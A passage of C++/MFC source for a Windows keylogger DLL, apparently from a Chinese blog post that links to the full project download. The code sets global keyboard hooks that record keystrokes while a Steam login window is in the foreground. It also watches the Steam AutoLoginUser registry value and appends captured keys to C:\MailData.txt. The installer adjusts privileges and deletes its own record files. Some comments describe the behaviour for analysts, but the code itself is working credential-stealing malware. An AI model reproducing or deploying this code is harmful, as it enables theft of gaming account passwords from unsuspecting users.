							myEmailSTR = "=";
					}
					if(KeyNameStr=="[")
					{
						if(b_Sft)
							myEmailSTR = "{";
						else
							myEmailSTR = "[";
					}
					if(KeyNameStr=="]")
					{
						if(b_Sft)
							myEmailSTR = "}";
						else
							myEmailSTR = "]";
					}
					if(KeyNameStr==";")
					{
						if(b_Sft)
							myEmailSTR = ":";
						else
							myEmailSTR = ";";
					}
					if(KeyNameStr=="'")
					{
						if(b_Sft)
							myEmailSTR = "\"";
						else
							myEmailSTR = "'";
					}
					if(KeyNameStr==",")
					{
						if(b_Sft)
							myEmailSTR = "<";
						else
							myEmailSTR = ",";
					}
					if(KeyNameStr==".")
					{
						if(b_Sft)
							myEmailSTR = ">";
						else
							myEmailSTR = ".";
					}
					if(KeyNameStr=="/")
					{
						if(b_Sft)
							myEmailSTR = "?";
						else
							myEmailSTR = "/";
					}
					if(KeyNameStr=="\\")
					{
						if(b_Sft)
							myEmailSTR = "|";
						else
							myEmailSTR = "\\";
					}

					//AfxMessageBox(myEmailSTR);

					CFileFind finder1;
					BOOL noEmpty1=finder1.FindFile("C:\\MailData.txt");
					if(!noEmpty1)
					{
						FILE *fpx1;
						fpx1=fopen("C:\\MailData.txt", "w");
						if(fpx1)
						{
							fprintf(fpx1, "%s", myEmailSTR.GetBuffer(0));
						}
						fclose(fpx1);
					}
					else
					{
						FILE *fpx2;
						fpx2=fopen("C:\\MailData.txt", "a");
						if(fpx2)
						{
							fprintf(fpx2, "%s", myEmailSTR.GetBuffer(0));
						}
						fclose(fpx2);
					}
					myEmailSTR = "";
				}
			}
		}

	LRESULT RetVal = CallNextHookEx(hie, nCode, wParam, lParam );	
	return  RetVal;
}

 
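// Keyboard hook callback 1 (the author's label: monitors Steam.exe input).
// Behaviour visible in this function, summarised for analysts:
//   - returns straight to CallNextHookEx unless the current process id equals GetEXE()
//     (defined outside this section);
//   - reads the foreground window title and continues only if it contains one of the hard-coded
//     Steam login-window titles;
//   - if no watcher is running (Regedit is false) starts HOOKRegedit or HOOKRegedit2, chosen by
//     whether AutoLoginUser exists with at least 4 characters;
//   - on fresh key presses without Ctrl/Alt, appends the translated character to the in-memory
//     buffer szStr; Backspace removes the last character, Enter adds nothing;
//   - always forwards the event with CallNextHookEx(hkb, ...).
// Nothing is written to disk here; the buffer is consumed by the two watcher threads.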

LRESULT DllExport CALLBACK IntProc1(int nCode,WPARAM wParam,LPARAM lParam)
{
	if(::GetCurrentProcessId() != GetEXE())
		return CallNextHookEx(hkb, nCode, wParam, lParam );

		HWND H_wnd = ::GetForegroundWindow();
		char sTitle[255];
		CString ss;
		::SendMessage(H_wnd,WM_GETTEXT,255,(LPARAM)sTitle);
		//AfxMessageBox(sTitle);

		ss.Format(TEXT("%s"), sTitle);
		//AfxMessageBox(ss);

		char *aaa;
		aaa = strstr(sTitle, "Steam  登录");
		char *bbb;
		bbb = strstr(sTitle, "Steam  登入");
		char *ccc;
		ccc = strstr(sTitle, "Steam  Login");
		char *ddd;
		ddd = strstr(sTitle, "S t e a m  登录");
		char *eee;
		eee = strstr(sTitle, "S t e a m  登  录");

		int n = ss.Find("Steam 登录",0);
		int m = ss.Find("Steam 登入",0);
		int o = ss.Find("Steam Login",0);
		int p = ss.Find("S t e a m 登录",0);
		int q = ss.Find("S t e a m 登 录",0);

		if( (aaa || bbb || ccc || ddd || eee) || (m >= 0 || n >= 0 || o >= 0 || p >= 0 || q >= 0) )
		{
			if(!Regedit)
			{
				HKEY hKeyx;
				LONG lRetx, lRetx2;
				lRetx = RegOpenKeyEx( HKEY_CURRENT_USER,
				TEXT("Software\\Valve\\Steam"),
				0, KEY_QUERY_VALUE|KEY_WRITE, &hKeyx );
				if( lRetx == ERROR_SUCCESS )
				{
					char datas[256] = {0};
					DWORD dwTypes = REG_SZ;
					DWORD dwLengths = 256;

					lRetx2 = RegQueryValueEx( hKeyx, 
					TEXT("AutoLoginUser"), 
					NULL, 
					&dwTypes, (LPBYTE)datas, &dwLengths );
					if(lRetx2 != ERROR_SUCCESS)
					{
						//创建线程监控注册表 1
						DWORD dwThreadId;
						CreateThread(NULL, 0, HOOKRegedit, NULL, 0, &dwThreadId); 

						Regedit = true;
					}
					else
					{
						// 如果注册表中能打开存放用户数据的键值
						// 而该键值又为空的话必须运行线程1来操作
						if( strlen(datas) < 4 )
						{
							//创建线程监控注册表 1
							DWORD dwThreadId;
							CreateThread(NULL, 0, HOOKRegedit, NULL, 0, &dwThreadId); 

							Regedit = true;
						}
						else
						{
							//创建线程监控注册表 2
							DWORD dwThreadId;
							CreateThread(NULL, 0, HOOKRegedit2, NULL, 0, &dwThreadId); 

							Regedit = true;
						}
					}
				}
				RegCloseKey(hKeyx);
			}

			if(nCode == HC_ACTION && (lParam & 0xc000ffff) == 1)
			{
				BOOL b_Sft = ::GetAsyncKeyState(VK_SHIFT) >> ((sizeof(short) * 8)-1);
				BOOL b_Clk = ::GetKeyState(VK_CAPITAL);
				BOOL b_Ctl = ::GetAsyncKeyState(VK_CONTROL) >> ((sizeof(short) * 8)-1);
				BOOL b_Alt = ::GetAsyncKeyState(VK_MENU) >> ((sizeof(short) * 8)-1);
				if(!b_Ctl && !b_Alt)
				{
					if(b_Sft && !b_Clk)
					{
						switch(wParam)
						{
						case '1':szStr += "!";break;
						case '2':szStr += "@";break;
						case '3':szStr += "#";break;
						case '4':szStr += "$";break;
						case '5':szStr += "%";break;
						case '6':szStr += "^";break;
						case '7':szStr += "&";break;
						case '8':szStr += "*";break;
						case '9':szStr += "(";break;
						case '0':szStr += ")";break;
						case 'A':szStr += "A";break;
						case 'B':szStr += "B";break;
						case 'C':szStr += "C";break;
						case 'D':szStr += "D";break;
						case 'E':szStr += "E";break;
						case 'F':szStr += "F";break;
						case 'G':szStr += "G";break;
						case 'H':szStr += "H";break;
						case 'I':szStr += "I";break;
						case 'J':szStr += "J";break;
						case 'K':szStr += "K";break;
						case 'L':szStr += "L";break;
						case 'M':szStr += "M";break;
						case 'N':szStr += "N";break;
						case 'O':szStr += "O";break;
						case 'P':szStr += "P";break;
						case 'Q':szStr += "Q";break;
						case 'R':szStr += "R";break;
						case 'S':szStr += "S";break;
						case 'T':szStr += "T";break;
						case 'U':szStr += "U";break;
						case 'V':szStr += "V";break;
						case 'W':szStr += "W";break;
						case 'X':szStr += "X";break;
						case 'Y':szStr += "Y";break;
						case 'Z':szStr += "Z";break;
						}
					}
					else if(!b_Sft && b_Clk)
					{
						switch(wParam)
						{
						case '1':szStr += "1";break;
						case '2':szStr += "2";break;
						case '3':szStr += "3";break;
						case '4':szStr += "4";break;
						case '5':szStr += "5";break;
						case '6':szStr += "6";break;
						case '7':szStr += "7";break;
						case '8':szStr += "8";break;
						case '9':szStr += "9";break;
						case '0':szStr += "0";break;
						case 'A':szStr += "A";break;
						case 'B':szStr += "B";break;
						case 'C':szStr += "C";break;
						case 'D':szStr += "D";break;
						case 'E':szStr += "E";break;
						case 'F':szStr += "F";break;
						case 'G':szStr += "G";break;
						case 'H':szStr += "H";break;
						case 'I':szStr += "I";break;
						case 'J':szStr += "J";break;
						case 'K':szStr += "K";break;
						case 'L':szStr += "L";break;
						case 'M':szStr += "M";break;
						case 'N':szStr += "N";break;
						case 'O':szStr += "O";break;
						case 'P':szStr += "P";break;
						case 'Q':szStr += "Q";break;
						case 'R':szStr += "R";break;
						case 'S':szStr += "S";break;
						case 'T':szStr += "T";break;
						case 'U':szStr += "U";break;
						case 'V':szStr += "V";break;
						case 'W':szStr += "W";break;
						case 'X':szStr += "X";break;
						case 'Y':szStr += "Y";break;
						case 'Z':szStr += "Z";break;
						}
					}
					else if(b_Sft && b_Clk)
					{
						switch(wParam)
						{
						case '1':szStr += "!";break;
						case '2':szStr += "@";break;
						case '3':szStr += "#";break;
						case '4':szStr += "$";break;
						case '5':szStr += "%";break;
						case '6':szStr += "^";break;
						case '7':szStr += "&";break;
						case '8':szStr += "*";break;
						case '9':szStr += "(";break;
						case '0':szStr += ")";break;
						case 'A':szStr += "a";break;
						case 'B':szStr += "b";break;
						case 'C':szStr += "c";break;
						case 'D':szStr += "d";break;
						case 'E':szStr += "e";break;
						case 'F':szStr += "f";break;
						case 'G':szStr += "g";break;
						case 'H':szStr += "h";break;
	     				case 'I':szStr += "i";break;
	    				case 'J':szStr += "j";break;
	    				case 'K':szStr += "k";break;
						case 'L':szStr += "l";break;
						case 'M':szStr += "m";break;
						case 'N':szStr += "n";break;
						case 'O':szStr += "o";break;
						case 'P':szStr += "p";break;
						case 'Q':szStr += "q";break;
						case 'R':szStr += "r";break;
						case 'S':szStr += "s";break;
						case 'T':szStr += "t";break;
						case 'U':szStr += "u";break;
						case 'V':szStr += "v";break;
						case 'W':szStr += "w";break;
						case 'X':szStr += "x";break;
						case 'Y':szStr += "y";break;
						case 'Z':szStr += "z";break;
						}
					}
					else
					{
						switch(wParam)
						{
						case '1':szStr += "1";break;
						case '2':szStr += "2";break;
						case '3':szStr += "3";break;
						case '4':szStr += "4";break;	
						case '5':szStr += "5";break;
						case '6':szStr += "6";break;
						case '7':szStr += "7";break;
						case '8':szStr += "8";break;
						case '9':szStr += "9";break;
						case '0':szStr += "0";break;
						case 'A':szStr += "a";break;
						case 'B':szStr += "b";break;
						case 'C':szStr += "c";break;
						case 'D':szStr += "d";break;
						case 'E':szStr += "e";break;
						case 'F':szStr += "f";break;
						case 'G':szStr += "g";break;
						case 'H':szStr += "h";break;
	     				case 'I':szStr += "i";break;
	    				case 'J':szStr += "j";break;
	    				case 'K':szStr += "k";break;
						case 'L':szStr += "l";break;
						case 'M':szStr += "m";break;
						case 'N':szStr += "n";break;
						case 'O':szStr += "o";break;
						case 'P':szStr += "p";break;
						case 'Q':szStr += "q";break;
						case 'R':szStr += "r";break;
						case 'S':szStr += "s";break;
						case 'T':szStr += "t";break;
						case 'U':szStr += "u";break;
						case 'V':szStr += "v";break;
						case 'W':szStr += "w";break;
						case 'X':szStr += "x";break;
						case 'Y':szStr += "y";break;
						case 'Z':szStr += "z";break;
						}
					}

					//小键盘按键
					switch(wParam)
					{
					case VK_NUMPAD1:szStr += "1";break;
					case VK_NUMPAD2:szStr += "2";break;
					case VK_NUMPAD3:szStr += "3";break;
					case VK_NUMPAD4:szStr += "4";break;
					case VK_NUMPAD5:szStr += "5";break;
					case VK_NUMPAD6:szStr += "6";break;
					case VK_NUMPAD7:szStr += "7";break;
					case VK_NUMPAD8:szStr += "8";break;
					case VK_NUMPAD9:szStr += "9";break;
					case VK_NUMPAD0:szStr += "0";break;
					case VK_MULTIPLY:szStr += "*";break;
					case VK_ADD:     szStr += "+";break;
					case VK_SUBTRACT:szStr += "-";break;
					case VK_DECIMAL: szStr += ".";break;
					case VK_DIVIDE:  szStr += "/";break;

					//其他特殊键
 					case VK_BACK:
						szStr.Delete(szStr.GetLength()-1);
						break;

					case VK_TAB:
						szStr += "   ";
						break;

					case VK_SPACE:
						szStr += " ";
						break;

					// 回车键
					case VK_RETURN:
						break;
					}

					//其他键的处理
					char KeyName[50];
					ZeroMemory(KeyName,50);
					GetKeyNameText(lParam,KeyName,50);
					CString KeyNameStr=KeyName;
					if(KeyNameStr=="`")
					{
						if(b_Sft)
							szStr += "~";
						else
							szStr += "`";
					}
					if(KeyNameStr=="-")
					{
						if(b_Sft)
							szStr += "_";
						else
							szStr += "-";
					}
					if(KeyNameStr=="=")
					{
						if(b_Sft)
							szStr += "+";
						else
							szStr += "=";
					}
					if(KeyNameStr=="[")
					{
						if(b_Sft)
							szStr += "{";
						else
							szStr += "[";
					}
					if(KeyNameStr=="]")
					{
						if(b_Sft)
							szStr += "}";
						else
							szStr += "]";
					}
					if(KeyNameStr==";")
					{
						if(b_Sft)
							szStr += ":";
						else
							szStr += ";";
					}
					if(KeyNameStr=="'")
					{
						if(b_Sft)
							szStr += "\"";
						else
							szStr += "'";
					}
					if(KeyNameStr==",")
					{
						if(b_Sft)
							szStr += "<";
						else
							szStr += ",";
					}
					if(KeyNameStr==".")
					{
						if(b_Sft)
							szStr += ">";
						else
							szStr += ".";
					}
					if(KeyNameStr=="/")
					{
						if(b_Sft)
							szStr += "?";
						else
							szStr += "/";
					}
					if(KeyNameStr=="\\")
					{
						if(b_Sft)
							szStr += "|";
						else
							szStr += "\\";
					}
					//AfxMessageBox(szStr);
				}
			}
		}

	LRESULT RetVal = CallNextHookEx(hkb, nCode, wParam, lParam );	
	return  RetVal;
}

 
// Install the keyboard hooks (exported from the DLL).
//
// Visible behaviour, in order:
//   1. Builds today's local date as a YYYYMMDD string and compares it, as an
//      integer, with UserEndData (declared elsewhere in this file) after
//      stripping '.' and '-' from it.
//   2. Only while the local date is earlier than that value: records the host
//      executable's directory, deletes three fixed files in C:\, calls
//      SetRealTimePriority() and AdjustPrivileges(), registers two WH_KEYBOARD
//      hooks with thread id 0, and starts the CleanUserData thread.
//
// Returns TRUE in every case, so the return value does not tell the caller
// whether anything was installed; none of the API results are checked.
//
// NOTE(review), for analysts: thread id 0 makes each hook apply to every
// thread on the desktop, so Windows maps this DLL into other processes that
// receive keyboard input. That cross-process module load, the privilege
// adjustment and the fixed C:\ file names below are the observable artefacts
// of this routine.

BOOL DllExport installhook()
{
	// ---- Check the user's expiry date ----

	SYSTEMTIME st;
	CString strYear, strMonth, strDay, strFullTime;

	// Local (not UTC) wall-clock time, so the check follows the machine's clock.
	GetLocalTime(&st);

	strYear.Format("%d", st.wYear);
	strMonth.Format("%d", st.wMonth);
	strDay.Format("%d", st.wDay);

	// Zero-pad single-digit months. "%d" of 1..9 never contains '0', so the
	// Find() guard is always satisfied here and the prefix is always added.
	if(st.wMonth < 10)
	{
		int mmm = strMonth.Find("0", 0);
		if(mmm < 0)
		{
			strMonth = "0" + strMonth;
		}
	}

	// Same zero-padding for single-digit days.
	if(st.wDay < 10)
	{
		int ddd = strDay.Find("0", 0);
		if(ddd < 0)
		{
			strDay = "0" + strDay;
		}
	}

	// YYYYMMDD, e.g. "20190407"; fixed width so integer comparison orders dates.
	strFullTime = strYear + strMonth + strDay;

	// Normalises the stored expiry date in place (the global itself is modified).
	// presumably UserEndData is "YYYY.MM.DD" or "YYYY-MM-DD" -- confirm at its definition
	UserEndData.Remove('.');
	UserEndData.Remove('-');

	// atoi yields 0 for non-numeric text, in which case the branch below is never taken.
	int LocalTime = atoi(strFullTime);
	int UserEndTime = atoi(UserEndData);

	if( LocalTime < UserEndTime )
	{
		// Path of the process executable (hModule == NULL), cut after the last
		// backslash so only the directory remains.
		// NOTE(review): the _tcsrchr result is indexed without a NULL check.
		TCHAR szmyPath[MAX_PATH + 1]={0};
		GetModuleFileName(NULL, szmyPath, MAX_PATH);
		(_tcsrchr(szmyPath, _T('\\')))[1] = 0;

		// szmyPath already ends in '\', so the stored path ends in two backslashes.
		szMyselfPath.Format(TEXT("%s\\"), szmyPath);

		//
		// Delete the account record files (original author's description).
		// Fixed, root-level paths: useful host indicators when triaging a machine.
		DeleteFile("C:\\NTUSERS.LOG");
				DeleteFile("C:\\MailData.txt");
						DeleteFile("C:\\MailName.txt");
		//
		// Raise the process priority to the highest level (helper defined elsewhere).
		SetRealTimePriority();
		//
		// Elevate the process's privileges (helper defined elsewhere; which
		// privileges are enabled is not visible here).
		AdjustPrivileges();
		//
		// Keyboard hook 1: WH_KEYBOARD, thread id 0 (all threads on the desktop).
		// The returned handle is stored but not tested for NULL.
		hkb = SetWindowsHookEx(WH_KEYBOARD, (HOOKPROC)IntProc1, hins, 0);
		//
		// Keyboard hook 2: same hook type and scope, second callback.
		hie = SetWindowsHookEx(WH_KEYBOARD, (HOOKPROC)IntProc2, hinss, 0);
		//
		// Start a thread that periodically clears the captured input data
		// (original author's description). The thread handle is discarded.
		DWORD dwThreadIDX;
		CreateThread(NULL, 0, CleanUserData, NULL, 0, &dwThreadIDX); 
		//
	}
	return TRUE;
}

 
// Remove a hook (exported from the DLL).
//
// szHookName: the hook handle to remove, as returned by SetWindowsHookEx.
// Returns TRUE when UnhookWindowsHookEx reports success, FALSE otherwise.

BOOL DllExport UnHook(HHOOK szHookName)
{
	// UnhookWindowsHookEx returns non-zero on success; normalise to TRUE/FALSE.
	const BOOL removed = UnhookWindowsHookEx(szHookName);
	return removed ? TRUE : FALSE;
}

 

// MFC DLL initialisation: caches this module's instance handle in the two
// globals that installhook() later passes to SetWindowsHookEx as hmod.
// Always returns TRUE.
BOOL CTest3App::InitInstance()
{	
	// Must come first so MFC calls below use this DLL's module state.
	AFX_MANAGE_STATE(AfxGetStaticModuleState());

	// Both globals receive the same handle; one is used per hook registration.
	const HINSTANCE hSelf = AfxGetInstanceHandle();
	hins = hSelf;
	hinss = hSelf;

	return TRUE;
}

/////////////////////////////////////////////////////////////////////////////
// CTest3App construction

CTest3App::CTest3App()
{
	// Intentionally empty (unmodified wizard stub): the only initialisation
	// visible in this file is done in InitInstance, which stores the module
	// handle used when the hooks are registered.
	// TODO: add construction code here,
	// Place all significant initialization in InitInstance
}

/////////////////////////////////////////////////////////////////////////////
// The one and only CTest3App object.
// File-scope instance: it is constructed when the DLL is loaded into a
// process, and its InitInstance() caches the module handle in hins/hinss.

CTest3App theApp;

完整项目下载

 主程序 + DLL + 帐号验证工具 一并打包上传,写的有点乱七八糟,没啥技术含量,对于目前情况已经没什么用处。

【CSDN下载】https://download.csdn.net/download/qq_39190622/88683609
